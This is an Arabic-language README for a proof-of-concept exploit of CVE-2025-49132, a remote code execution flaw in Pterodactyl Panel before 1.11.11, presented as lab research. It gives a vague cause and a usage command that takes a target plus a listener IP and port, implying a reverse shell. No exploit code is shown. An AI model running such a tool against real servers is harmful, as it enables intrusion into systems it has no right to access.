
يستغل هذا السكربت ثغرة تنفيذ الكود عن بُعد في Pterodactyl Panel < 1.11.11
يحتوي هذا المستودع على إثبات مفهوم (PoC) لثغرة CVE-2025-49132، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) تؤثر على Pterodactyl Panel < 1.11.11
تم تطوير هذا الـ PoC واختباره في بيئة مختبرية خاضعة للتحكم لأغراض البحث والتعليم.
تنبع الثغرة من عدم كفاية التحقق من صحة المدخلات التي يتحكم فيها المستخدم في معالج الطلبات، مما يسمح بتفاعل غير مقصود مع الواجهة الخلفية.
في ظل ظروف معينة، يمكن أن يؤدي ذلك إلى تنفيذ أوامر عن بُعد.
python3 exploit.py -t <target> -l <listener_ip> -p <listener_port>